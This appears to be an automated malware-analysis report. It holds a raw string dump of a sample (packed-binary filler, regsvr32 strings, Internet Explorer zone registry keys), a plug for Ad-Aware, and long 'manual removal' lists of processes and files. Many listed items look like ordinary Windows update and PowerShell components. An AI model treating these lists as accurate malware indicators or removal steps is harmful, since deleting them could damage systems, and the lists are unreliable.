JLWKNn9CroMhyWiXMpK3RpnEH1F2gq3IjD5A7x/hLRzjXsnnlRx7x/3A0FpxYtaUCJabufXxuviuEf1DOtUTWc9Wr2UrNBYM7DFNSLCxHZcJia1lgd5C1edP/kieQhkc NJYm19rrk VmoDhQ5o VKFEfpfbODG m 9hiG3XGrLTFOyD2poOudhV2MXnSRut/jCc/RVxkKj8mzhTi1 IOoQHopYwbdrbMtN0aqrN1gp6HWaNm4pfWzfKrobU4qX6UQm2ceiTzaC8VNQoEX6Y4ACHu7gBvSf6/Xh cNXKIGydZ3TSUlQt1NuCd8PLe5535THWB2smI Lb nxKYgRi/tpxiNp6cvbvyQLpHqwPI6oGNFczLcWffb8gaJHRYuzx47AWT DSmy8VwHr4PZJzgdP0AKXVtsPJGyggPWLA/0wUS6WG2TmQHSXcgKlpr7Uf8CDBY0CiteleSNh3ZE0CuY wOFuQpw0hW4w34yypzZVsx9y5i0teholLN9B4KU3KtGtT21M xDvlH5oapAVgyX6v4zpzLoxpPSXZYf GQtlyokLrmhEDg0kWvwKZAPOpbl 2T8G2Ae9o3p1y/lAL/Z6LbUVCeMVJQXr5Hpqwu IrKzZRz1V/ Oer1z0HbaTZmLPi1zQaPCDVPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD1
WindowsUpdate
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666

regsvr32.exe_928_rwx_01000000_00005000:

.text
`.data
.rsrc
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
ole32.dll
regsvr32.pdb
_wcmdln
RegCloseKey
RegOpenKeyExW
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
Windows
Operating System
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mofcomp.exe:2768
    WindowsXP-KB968930-x86-ENG.exe:804
    ngen.exe:4084
    ngen.exe:3616
    ngen.exe:3712
    ngen.exe:3636
    ngen.exe:3672
    ngen.exe:252
    ngen.exe:3652
    ngen.exe:4092
    ngen.exe:3576
    ngen.exe:492
    ngen.exe:364
    ngen.exe:3628
    ngen.exe:3600
    ngen.exe:3660
    ngen.exe:3608
    ngen.exe:1796
    ngen.exe:3524
    ngen.exe:3644
    ngen.exe:3720
    ngen.exe:3704
    ngen.exe:3560
    ngen.exe:3680
    ngen.exe:3548
    %original file name%.exe:792
    update.exe:304
    mscorsvw.exe:3464
    mscorsvw.exe:3456
    mscorsvw.exe:3680
    mscorsvw.exe:3532
    mscorsvw.exe:2924
    mscorsvw.exe:2700
    mscorsvw.exe:2160
    mscorsvw.exe:2756
    mscorsvw.exe:3136
    mscorsvw.exe:3336
    mscorsvw.exe:3408
    mscorsvw.exe:280
    mscorsvw.exe:3816
    mscorsvw.exe:1112
    mscorsvw.exe:2940
    PSCustomSetupUtil.exe:3868
    PSCustomSetupUtil.exe:2844
    PSCustomSetupUtil.exe:2924
    PSCustomSetupUtil.exe:3140
    PSCustomSetupUtil.exe:3004
    PSCustomSetupUtil.exe:3060
    PSCustomSetupUtil.exe:3308
    PSCustomSetupUtil.exe:3736
    PSCustomSetupUtil.exe:3164
    PSCustomSetupUtil.exe:3232
    PSCustomSetupUtil.exe:3028
    PSCustomSetupUtil.exe:3104
    PSCustomSetupUtil.exe:3256
    PSCustomSetupUtil.exe:3892
    PSCustomSetupUtil.exe:3844
    PSCustomSetupUtil.exe:2872
    PSCustomSetupUtil.exe:3768
    PSCustomSetupUtil.exe:3936
    PSCustomSetupUtil.exe:3984
    PSCustomSetupUtil.exe:2972
    PSCustomSetupUtil.exe:3284
    PSCustomSetupUtil.exe:3788
    PSCustomSetupUtil.exe:2896
    PSCustomSetupUtil.exe:3192
    PSCustomSetupUtil.exe:3960
    PSCustomSetupUtil.exe:2792
    PSSetupNativeUtils.exe:2068
    regsvr32.exe:1976
    regsvr32.exe:780
    wsmanhttpconfig.exe:2740
    wsmanhttpconfig.exe:2668

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll (3118 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshmsg.dll (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.runtime.dll (33 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_automatic_variables.help.txt (14 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmpty.xsl (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\eula.txt (586 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.dll (591 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll (1145 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_jobs.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spuninst.exe (3787 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_do.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_troubleshooting.help.txt (146 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_ref.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\eventforwarding.adm (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_debuggers.help.txt (21 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\profile.ps1 (772 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_environment_variables.help.txt (417 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_operators.help.txt (770 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmanhttpconfig.exe (3009 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_profiles.help.txt (457 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmsvc.dll (15909 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_aliases.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_wmi_cmdlets.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spupdsvc.exe (287 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\certificate.format.ps1xml (155 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssnapins.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_hash_tables.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_special_characters.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_faq.help.txt (775 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrs.exe (1154 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.exe (10748 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrshost.exe (22 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_switch.help.txt (489 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershellcore.format.ps1xml (1492 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmprovhost.exe (657 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.psd1 (950 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_continue.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_parameters.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.inf (2457 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrmprov.mof (789 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\kb968930xp.cat (512 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_comment_based_help.help.txt (595 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_wildcards.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_signing.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\updspapi.dll (5940 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssessions.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.dll-help.xml (16567 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_while.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_job_details.help.txt (824 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\dotnettypes.format.ps1xml (266 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmplpxy.dll (603 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_requires.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_objects.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_syntax.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.resources.dll (9 bytes)
    C:\$Directory (800 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll (5010 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_arrays.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_for.help.txt (146 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.dll (1842 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_properties.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_join.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrscmd.dll (2907 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_internationalization.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_requirements.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\bitstransfer.format.ps1xml (16 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_scripts.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_eventlogs.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_return.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_comparison_operators.help.txt (11 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_command_precedence.help.txt (8 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_locations.help.txt (794 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_modules.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshplugin.dll (802 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pssetupnativeutils.exe (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_line_editing.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pssession_details.help.txt (9 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_foreach.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrssrv.dll (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremotemanagement.adm (574 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.ini (1956 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmtxt.xsl (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_parsing.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.exe (2526 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrsmgr.dll (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_try_catch_finally.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowsremoteshell.adm (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wtrinstaller.ico (4803 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_preference_variables.help.txt (37 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmwmipl.dll (2816 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_type_operators.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_format.ps1xml.help.txt (17 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_execution_policies.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_trap.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_break.help.txt (792 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_throw.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_providers.help.txt (59 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_prompts.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\getevent.types.ps1xml (15 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_assignment_operators.help.txt (379 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\importallmodules.psd1 (438 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_reserved_words.help.txt (1 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\help.format.ps1xml (3947 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\$shtdwn$.req (788 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_path_syntax.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_quoting_rules.help.txt (659 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_types.ps1xml.help.txt (481 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pscustomsetuputil.exe (316 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmres.dll (6164 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_bits_cmdlets.help.txt (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_if.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell.exe.mui (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\windowspowershellhelp.chm (26041 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_logical_operators.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_regular_expressions.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_redirection.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_output.help.txt (887 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershell_ise.resources.dll (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pwrshsip.dll (24 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.editor.dll (14450 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_arithmetic_operators.help.txt (168 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\spmsg.dll (495 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wevtfwd.dll (3351 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\diagnostics.format.ps1xml (590 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsmauto.mof (4 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.cmd (35 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_language_keywords.help.txt (11 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_split.help.txt (10 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\types.ps1xml (2510 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_scopes.help.txt (76 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_variables.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\winrm.vbs (2727 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_escape_characters.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_methods.help.txt (6 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\registry.format.ps1xml (20 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_functions.help.txt (586 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\system.management.automation.resources.dll (3153 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_commonparameters.help.txt (12 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\powershelltrace.format.ps1xml (344 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_script_blocks.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_transactions.help.txt (1011 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_pipelines.help.txt (411 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\default.help.txt (2 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_history.help.txt (3 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\update.ver (14 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\update\spcustom.dll (23 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\pspluginwkr.dll (1756 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_remote_jobs.help.txt (13 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_data_sections.help.txt (5 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\filesystem.format.ps1xml (133 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_core_commands.help.txt (221 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\about_session_configurations.help.txt (276 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ae90c0f98410dabe3b7635b5ceb43e\wsman.format.ps1xml (837 bytes)
    %WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)
    %System%\SETBF.tmp (42 bytes)
    %WinDir%\ocmsn.log (7791 bytes)
    %System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
    %System%\SET12.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
    %System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
    %System%\SETC.tmp (2105 bytes)
    %System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
    %System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
    %System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
    %System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
    %System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
    %System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
    %System%\SET2D.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
    %System%\SET25.tmp (1281 bytes)
    %System%\SET13.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
    %System%\SET20.tmp (2 bytes)
    %System%\SET14.tmp (25 bytes)
    %System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
    %System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
    %WinDir%\inf\SET32.tmp (38 bytes)
    %WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
    %System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
    %System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
    %System%\SET2A.tmp (2 bytes)
    %WinDir%\inf\oem10.PNF (10136 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
    %System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
    %System%\SET7.tmp (35 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
    %System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
    %WinDir%\msmqinst.log (5648 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
    %System%\SET22.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
    %System%\spmsg.dll (14 bytes)
    %System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
    %System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
    %System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
    %System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
    %System%\SET2B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
    %System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
    %System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
    %WinDir%\inf\SET18.tmp (38 bytes)
    %System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
    %System%\SETE.tmp (22 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
    %System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
    %System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
    %System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
    %System%\SET6.tmp (2 bytes)
    %System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
    %System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
    %System%\wbem\SET4.tmp (4 bytes)
    %System%\SET17.tmp (673 bytes)
    %WinDir%\tabletoc.log (2313 bytes)
    %System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
    %System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
    %System%\SETA.tmp (7433 bytes)
    %System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
    %WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
    %System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
    %System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
    %WinDir%\MedCtrOC.log (8910 bytes)
    %System%\config\SYSTEM.LOG (5193 bytes)
    %System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
    %System%\SET27.tmp (601 bytes)
    %System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
    %System%\SET11.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
    %System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
    %System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
    %System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
    %System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
    %WinDir%\Help\SETC5.tmp (12287 bytes)
    %System%\SET8.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
    %WinDir%\msgsocm.log (6541 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
    %System%\SETF.tmp (1281 bytes)
    %System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
    %System%\SET10.tmp (2 bytes)
